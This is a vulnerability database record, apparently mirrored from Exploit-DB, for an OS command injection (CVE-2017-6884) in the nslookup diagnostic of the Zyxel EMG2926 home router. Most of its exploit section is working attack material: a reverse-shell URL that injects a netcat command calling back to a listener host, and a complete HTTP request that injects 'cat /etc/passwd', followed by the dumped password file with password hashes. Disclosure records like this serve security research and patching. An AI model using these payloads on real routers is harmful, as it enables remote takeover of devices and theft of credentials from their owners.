ID
VAR-E-201704-0138
CVE
| cve_id: | CVE-2017-6884 | Trust: 1.5 |
EDB ID
41782
TITLE
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection - Hardware webapps Exploit
Trust: 0.6
DESCRIPTION
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection. CVE-2017-6884 . webapps exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | zyxel | model: | emg2926 v1.00 b8 | scope: | lt | version: | - | Trust: 1.6 |
| vendor: | zyxel | model: | emg2926 | scope: | eq | version: | / | Trust: 0.5 |
EXPLOIT
# Exploit Title: Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection
# Date: 2017-04-02
# Exploit Author: Fluffy Huffy (trevor Hough)
# Vendor Homepage: www.zyxel.com
# Version: EMG2926 - V1.00(AAQT.4)b8
# Tested on: linux
# CVE : CVE-2017-6884
OS command injection vulnerability was discovered in a commonly used
home router (zyxel - EMG2926 - V1.00(AAQT.4)b8). The vulnerability is located in the diagnostic tools
specify the nslookup function. A malicious user may exploit numerous
vectors to execute arbitrary commands on the router.
Exploit (Reverse Shell)
https://192.168.0.1/cgi-bin/luci/;stok=redacted/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&
ping_ip=google.ca%20%3B%20nc%20192.168.0.189%204040%20-e%20/p
Exploit (Dump Password File)
Request
GET /cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup?nslookup_button=nslookup_button&ping_ip=google.ca%3b%20cat%20/etc/passwd&server_ip= HTTP/1.1
Host: 192.168.0.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.110 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Referer: http://192.168.0.1/cgi-bin/luci/;stok=<Clipped>/expert/maintenance/diagnostic/nslookup
Accept-Language: en-US,en;q=0.8
Cookie: csd=9; sysauth=<Clipped>
Connection: close
Response (Clipped)
<textarea cols="80" rows="15" readonly="true">root:x:0:0:root:/root:/bin/ash
daemon:*:1:1:daemon:/var:/bin/false
ftp:*:55:55:ftp:/home/ftp:/bin/false
network:*:101:101:network:/var:/bin/false
nobody:*:65534:65534:nobody:/var:/bin/false
supervisor:$1$RM8l7snU$KW2C58L2Ijt0th1ThR70q0:0:0:supervisor:/:/bin/ash
admin:$1$<Clipped>:0:0:admin:/:/bin/fail
Trust: 1.0
EXPLOIT LANGUAGE
txt
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
OS Command Injection
Trust: 1.6
TAGS
| tag: | exploit | Trust: 0.5 |
CREDITS
trevor Hough
Trust: 0.6
EXTERNAL IDS
| db: | EXPLOIT-DB | id: | 41782 | Trust: 1.6 |
| db: | NVD | id: | CVE-2017-6884 | Trust: 1.5 |
| db: | EDBNET | id: | 92364 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 141900 | Trust: 0.5 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-6884 | Trust: 1.5 |
| url: | https://www.exploit-db.com/exploits/41782/ | Trust: 0.6 |
SOURCES
| db: | PACKETSTORM | id: | 141900 |
| db: | EXPLOIT-DB | id: | 41782 |
| db: | EDBNET | id: | 92364 |
LAST UPDATE DATE
2022-07-27T09:58:27.992000+00:00
SOURCES RELEASE DATE
| db: | PACKETSTORM | id: | 141900 | date: | 2017-04-02T03:22:22 |
| db: | EXPLOIT-DB | id: | 41782 | date: | 2017-04-02T00:00:00 |
| db: | EDBNET | id: | 92364 | date: | 2017-04-03T00:00:00 |